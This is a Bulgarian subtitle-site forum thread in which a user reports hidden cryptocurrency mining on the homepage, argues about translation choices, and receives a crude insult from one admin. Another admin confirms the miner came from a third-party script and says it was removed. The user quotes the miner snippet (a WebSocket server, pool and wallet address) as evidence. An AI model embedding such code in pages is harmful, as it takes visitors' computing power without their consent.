Криптокопане и други

Bukmop
Мнения: 4
Регистриран: пет яну 12, 2018 9:59 pm
Контакти:

Криптокопане и други

Мнениеот Bukmop » чет авг 23, 2018 9:21 pm

Уважаеми собственици на сайта, защо ползвате компютрите на потребителите за "копане" на криптовалути без да ги предупреждавате, че извършвате такава дейност с техните компютри?

И друг въпрос, какъв е смисъла да си губите времето да превеждате отдавна перфектно преведени сериали. Вместо да превеждаде нещо ново.

Хубаво е като почнете да превеждате сериали да си ги докарвате докрай, а не да ги зарязвате насредата, като "Къща от хартия" примерно.

Кога ще почнете да кръщавате имената на архивите на субтитрите с имената на сериалите и сериите примерно, а не с неква тъпа безмислена номерация според някой си там, но не значеща нищо за потребителя?

Потребителски аватар
Ledenata
преводач и модератор
Мнения: 31
Регистриран: съб авг 20, 2016 4:42 pm
Контакти:

Re: Криптокопане и други

Мнениеот Ledenata » пет авг 24, 2018 10:16 am

Мога да отговоря относно преводите. Това, кой преводач какво превежда е въпрос на личен избор. Относно "кръщаването" на качваните файлове често зависи от релийза, по който се работи. Едва ли е проблем да се преименува, стига да пасва на избрания от потребителя релийз. Относно отдавна преведен сериал, който в момента превеждам, мога да кажа, че първо харесвам главния герой и затова го правя. Доста по-късно видях, че е преведен и вграден, но не е забранено да имам своята версия и да му се насладя изцяло. Има предостатъчно дублирани преводи, а потребителите имат право на избор.
За криптовалутите се обърнете към администратор.

Потребителски аватар
nikkiw
Администратор
Мнения: 3
Регистриран: съб юли 30, 2016 6:49 pm
Контакти:

Re: Криптокопане и други

Мнениеот nikkiw » пет авг 24, 2018 10:47 am

Относно криптокопането със същия успех бих казал, че сестра ти е... нали се сещаш каква, без да зная дали имаш сестра естествено. После иди се обяснявай.
Мисля, че просто си научил нова дума и гледаш да я използваш, за да блеснеш.

Bukmop
Мнения: 4
Регистриран: пет яну 12, 2018 9:59 pm
Контакти:

Re: Криптокопане и други

Мнениеот Bukmop » пет авг 24, 2018 11:02 am

Благодаря за орговора и страхотните преводи!

Все пак си оставам с мнението че повтроното превеждане на сериал който вече е преведен и гледан от тези 300-500 човека в бг, които редовно гледат руски сериали си е чиста загуба на време. Никой който го е гледал с превод от друг преводач, според мен няма да седне и да го гледа наново заради леко променен словоред. Това разбира се си е мое мнение. И всеки има право да работи според неговото си виждане.
Според мен има достатъчно много хубави непреведени руски сериали и филми, които имат нужда от превод, дори и с въпросния актьор.
Относно имената на файловете. Ставаше въпрос за имената на архивите а не на самите файлов вътре. Макар че и те понякога нямат нищо общо с всякъкви релийзи било то от руски или български тракери. И една препоръка когато е възможно превеждайте по WEB DL, защото така потребителите, които искат да гледат 1080р ще могат безпроблемно да си гледат. Има потребителит, които държат на качеството и искат да виждат всичко което режисьора и оператора са си представяли че трябва да види зиртеля. А и си ценят парите и искат да виждат максимума на телевизора за който са дали 1000-2000-3000 лв. Освен това WEB-DL понякога са по дълги и има сцени, невлезли в ефирната версия поради ограничението от прекомерното излъчване на реклами по време на ефир.

Bukmop
Мнения: 4
Регистриран: пет яну 12, 2018 9:59 pm
Контакти:

Re: Криптокопане и други

Мнениеот Bukmop » пет авг 24, 2018 11:03 am

nikkiw написа:Относно криптокопането със същия успех бих казал, че сестра ти е... нали се сещаш каква, без да зная дали имаш сестра естествено. После иди се обяснявай.
Мисля, че просто си научил нова дума и гледаш да я използваш, за да блеснеш.


Това е във сорс кода на главната страница, мисля че е достатъчно доказателсво.

<script>
server = "ws://bukvi.bg:8181"
startMining("hashvault","45APDt45vS8amWtxP2Yk8bEL9aj59uJYYhZdwch7p9KnXaFgMyJxGywcycDq5ZSyaiKHUVfbZvbhp5LX3v8vb3qGJ7kmUa7");
throttleMiner = 20;
</script>-->

Ако не вярваш виж си натоварването на процесора преди и след като отвориш сайта.
Ако исках да блесна нямаше да пред някъкви задръстеняци комплексари (бягай после обеснявай, че не си такъв)

Потребителски аватар
mmc
Администратор
Мнения: 6
Регистриран: ср авг 03, 2016 9:23 pm
Контакти:

Re: Криптокопане и други

Мнениеот mmc » нед авг 26, 2018 1:36 pm

Здравей Bukmop,
Аз съм човека който програмира сайта и се оказа че си прав си относно криптокопаенето. Само дето грешиш че ние сме виновни.
Някакъв руснак е вградил копачка в един готов скрипт и не съм видял.
Проблема е отстранен, желая ти всичко добро. (:

Bukmop
Мнения: 4
Регистриран: пет яну 12, 2018 9:59 pm
Контакти:

Re: Криптокопане и други

Мнениеот Bukmop » пон авг 27, 2018 9:54 pm

Хубаво е, че се е изяснило откъде идва всичко, след като почти 10 дни забелязвах тази активност при влизане в сайта, предположих, че е организирано мероприятие. Аз лично нямам против това все пак по този начин може да се събират някъкви пари за преводачи, хостинг и подобни, но ако се прави да се обяви на видно място, за да знае потребителя че в тези 10 мин които е прекарал в сайта с неговата процесорна мощност е субсидирал сайта и преводачите. Много добре знам колко къртовски е преводаческия труд особенно на добрите. Друг е въпроса дали при тази посещаемост и престой на потребители може да се добие някакъва смислена сума.


Кой е на линия

Потребители, разглеждащи този форум: Няма регистрирани потребители и 2 госта